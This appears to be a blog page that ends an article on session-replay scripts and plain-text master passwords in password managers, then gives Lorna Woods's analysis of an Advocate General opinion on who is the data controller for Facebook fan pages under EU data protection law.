While it’s not news that companies are monitoring our behaviour as we surf the web, the fact that scripts are quietly being deployed to record individual browser sessions in this way has concerned the study’s co-author, Steven Englehardt, who is a PhD candidate at Princeton.

A website user replay demo in action.

“Collection of page content by third-party replay scripts may cause sensitive information, such as medical conditions, credit card details, and other personal information displayed on a page, to leak to the third-party as part of the recording,” he wrote. “This may expose users to identity theft, online scams and other unwanted behaviour. The same is true for the collection of user inputs during checkout and registration processes.”

Keystroke logging by websites has been a known issue among cybersecurity experts for a while. And Princeton's empirical study raises valid concerns about users having little or no control over their surfing behaviour being recorded in this way.

So it’s important to help users control how their information is shared online. But there are increasing signs of usability trumping security measures that are designed to keep our data safe online.

Usability vs security

Password managers are used by millions of people to help them easily keep a record of different passwords for different sites. The user of such a service only needs to memorise one key password.

Recently, a group of researchers at the University of Derby and the Open University discovered that the offline clients of password manager services risked exposing the master password, which was stored as plain text in memory where it could be sniffed or dumped by whole-system attacks.

User experience is not an excuse for tolerating security flaws.

This article was originally published on The Conversation. Read the original article.

Who’s responsible for what happens on Facebook? Analysis of a new ECJ opinion

Tue, 28/11/2017 - 11:01

In this guest post, Lorna Woods, Professor of Internet Law at the University of Essex, provides an analysis of a new ECJ opinion. This post first appeared on the blog of Steve Peers, Professor of EU, Human Rights and World Trade Law at the University of Essex.

Who is responsible for data protection law compliance on Facebook fan sites? That issue is analysed in a recent opinion of an ECJ Advocate-General, in the case of Wirtschaftsakademie (full title: Unabhängiges Landeszentrum für Datenschutz Schleswig-Holstein v Wirtschaftsakademie Schleswig-Holstein GmbH, in the presence of Facebook Ireland Ltd, Vertreter des Bundesinteresses beim Bundesverwaltungsgericht).

This case is one more in a line of cases dealing specifically with the jurisdiction of national data protection supervisory authorities, a line of reasoning which seems to operate separately from the Brussels I Recast Regulation, which concerns the jurisdiction of courts over civil and commercial disputes.  While this is an Advocate-General's opinion, and therefore not binding on the Court, if followed by the Court it would consolidate the Court's prior broad interpretation of the Data Protection Directive.  While this might be the headline, it is worth considering a perhaps overlooked element of the data economy: the role of the content provider in supplying the individuals whose data is harvested.

Facts

Wirtschaftsakademie set up a 'fan page' on Facebook.  The data protection authority in Schleswig-Holstein sought the deactivation of the fan page on the basis that visitors to the fan page were not warned that their personal data would be collected by means of cookies placed on the visitor's hard disk. The purpose of that data collection was twofold: to compile viewing statistics for the administrator of the fan page; and to enable Facebook to target advertisements at each visitor by tracking the visitors' web browsing habits, otherwise known as behavioural advertising.  Such activity must comply with the Data Protection Directive (DPD) (as implemented in the various Member States).  While the content attracting visitors was that of Wirtschaftsakademie, it relied on Facebook for data collection and analysis. It is here that a number of preliminary questions arise:

  • Who is the controller for the purposes of the data protection regime?
  • Which national law is applicable?
  • What is the scope of the national supervisory authority's regulatory competence?

Opinion

Controller

The referring court had assumed that Wirtschaftsakademie was not a controller, as it had no influence, in law or in fact, over the manner in which the personal data was processed by Facebook, and the fact that Wirtschaftsakademie had recourse to analytical tools for its own purposes did not change this [para 28]. Advocate General Bot, however, disagreed with this assessment, arguing that Wirtschaftsakademie was a joint controller for the purposes of the DPD – a possibility for which Article 2(d) DPD makes explicit provision [paras 42, 51, 52].  The Advocate General accepted that the system was designed by Facebook so as to facilitate a data-driven business model and that Wirtschaftsakademie was principally a user of the social network [para 53]. But he highlighted that without the participation of Wirtschaftsakademie the data processing in respect of its visitors could not occur, and that Wirtschaftsakademie could end that processing by closing the relevant fan page down. In sum:

Inasmuch as he agrees to the means and purposes of the processing of personal data, as predefined by Facebook, a fan page administrator must be regarded as having participated in the determination of those means and purposes. [para 56]

Advocate General Bot further suggested that the use of the various filters included in the analytical tools provided meant that the user had a direct impact on how data was processed by Facebook. To similar effect, a user can also seek to reach specific audiences, as defined by the user.  As a result, the user has a controlling role in the acquisition phase of data processing by Facebook. The Advocate General rejected a formal analysis based on the terms of the contract concluded by the user and Facebook [para 60]; the fact that the user may be presented with 'take it or leave it' terms does not affect the fact that the user may be a controller.

As a final point, the Advocate General referred to the risk of data protection rules being circumvented, arguing that:

had the Wirtschaftsakademie created a website elsewhere than on Facebook and implemented a tool similar to ‘Facebook Insights’ in order to compile viewing statistics, it would be regarded as the controller of the processing needed to compile those statistics [para 65].

A similar approach should be taken in relation to social media plug-ins (such as Facebook's 'like' button), which allow Facebook to gather data on third-party websites without the end-user's consent (see Case C-40/17 Fashion ID, pending).

Having recognised that joint responsibility was an important factor in ensuring the protection of rights, the Advocate General – referring to the approach of the Article 29 Working Party on data protection – clarified that this did not mean that both parties would have equal responsibility, but rather their respective responsibility would vary depending on their involvement at the various stages of processing activities.

Applicable Law

Facebook is established outside the EU, but it has a number of EU established subsidiaries: the subsidiary which has responsibility for data protection is established in Ireland, while the other subsidiaries have responsibility for the sale of advertising.  This raises a number of questions: can the German supervisory authority exercise its powers and if so, against which subsidiary?

Applicable law is dealt with in Article 4 DPD, which refers to the competence of the Member State where the controller is established but which also envisages the possibility, in the case of a non-EU parent company, of multiple establishments.  The issue comes down to the interpretation of the phrase from Art. 4(1)(a), ‘in the context of the activities of an establishment’, which according to Weltimmo cannot be interpreted restrictively [para 87].  The Advocate General determined that there were two criteria [para 88]:

  • An establishment within the relevant Member State; and
  • Processing in connection with that establishment.

Relying on Weltimmo and Verein für Konsumenteninformation, the Advocate General identified the relevant factors, which are based on the general freedom of establishment approach to the question of establishment, looking for real activity through stable arrangements; the approach is not formalistic. Facebook Germany clearly satisfies these tests.

Referring to Article 29 Working Party Opinion 8/2010, the Advocate General reiterated that, in relation to the second criterion, it is context not location that is important. In Google Spain, the Court of Justice linked the selling of advertising (in Spain) to the processing of data (in the US) to hold that the processing was carried out in the context of the Spanish subsidiary, given the economic nexus between the processing and the advertising revenue.  The business set-up for Facebook here is the same, and the fact that there is an Irish office does not change the fact that the data processing takes place in the context of the German subsidiary.  The DPD does not introduce a one-stop shop; to the contrary, a deliberate choice was made to allow the application of multiple national legal systems (see Rec 19 DPD), and this approach is supported by the judgment in Verein für Konsumenteninformation in relation to Amazon.  The system will change with the entry into force of the General Data Protection Regulation (GDPR), but the Advocate General proposed that the Court should not pre-empt the entry into force of that legislation (due May 2018) in its interpretation, as the cooperation mechanism on which it depends is not yet in place [para 103].

Regulatory Competence

By contrast to Weltimmo, where the supervisory authority was seeking to impose a fine on a company established in another Member State, here the supervisory authority would be imposing German law on a German company.  There is a question, however, as to the addressee of any enforcement measure. On one interpretation, the German regulator should have the power only to direct compliance on the company established on its territory, even though that might not be effective. Alternatively, the DPD could be interpreted so as to allow the German regulator to direct compliance from Facebook Ireland. Looking at the fundamental role of controllers, Advocate General Bot suggested that this was the preferred solution. Article 28(1), (3) and (6) DPD entitle the supervisory authority of the Member State in which the establishment of the controller is located, by contrast to the position in Weltimmo, to exercise its powers of intervention without being required first to call on the supervisory authority of the Member State in which the controller is located to exercise its powers.

Comment

The novelty in this Opinion relates to the first question, and it is significant because the business model espoused by social media companies depends on the participation of those providing content, who seem at the moment to take little responsibility for their actions.  The price paid by third parties (in terms of data) is facilitated by these content providers, allowing them to avoid or minimise their business costs.  Should enforcement be applied consistently against such users, this may gradually have an effect on the underlying platform's business model.  While it is harder to regulate mice than elephants, at least these mice appear to be clearly within the geographic jurisdiction of the German regulator – and will remain so even when the GDPR is in force.

The Advocate General went out of his way to explain that there was no difference between the situation in issue here and that in the other relevant pending case, Case C-40/17 Fashion ID.  That case concerns a website provider's choice to embed in its site third-party code that allows the collection of data about visitors, for the provider's own ends (increased visibility of, and thus traffic to, the website): the code in question is that underpinning the Facebook 'like' button, but the reasoning would presumably also cover similar code from Twitter or Instagram.

If there was any doubt from cases such as Weltimmo about whether there is a one-stop shop (i.e. only one possible supervisory authority with jurisdiction across the EU) in the Data Protection Directive, the Advocate General expressly rejects this point.  In this context, the case adds little new, rather elaborating points of detail based on the precise factual set-up of Facebook's operations in the EU. It seems well established now that – at least under the DPD – clever multinational corporate structures cannot funnel data protection compliance through a chosen national regime.

It may be worth noting also the broad approach of the Advocate General to Google Spain when determining whether processing is in the context of activities. There the Court observed that:

‘in such circumstances, the activities of the operator of the search engine and those of its establishment situated in the Member State concerned are inextricably linked since the activities relating to the advertising space constitute the means of rendering the search engine at issue economically profitable and that engine is, at the same time, the means enabling those activities to be performed’ [Google Spain, para 56]

Here, the Advocate General focussed on the fact that social networks such as Facebook generate much of their revenue from advertisements posted on the web pages set up and accessed by users and that there is therefore an indissoluble link between the two activities.  Thus it seems that the Google Spain reasoning applies broadly to many free services paid for by user data, even if third parties – for example those providing the content on the page visited – are involved too.

Of course, the GDPR does introduce a one-stop shop; arguably, therefore, these cases will soon be of historic interest only.  The GDPR provides that the regulator of the controller's main EU establishment should have lead responsibility for regulation, with the regulators of other Member States being 'concerned authorities'.  There are two points to note: first, there is a system in place to facilitate the cooperation of the relevant supervisory authorities (Art 60), including possible recourse to a 'consistency mechanism' (Art 63 et seq); secondly, the competence of the lead authority to act in relation to cross-border processing in Article 66 operates without prejudice to the competence of each national supervisory authority in its own territory set out in Article 55.  The first of these points concerns the attempt to limit regulatory arbitrage and a downward spiral of standards under the GDPR as applied, together with the broad approach to establishment. The interest of the recipient state in regulating means that there may be many cases involving 'concerned authorities'.  The precise implications of the second point are not clear; note, however, that the one-stop shop as regards Facebook would seemingly not stop data protection authorities taking enforcement action against users such as Wirtschaftsakademie.
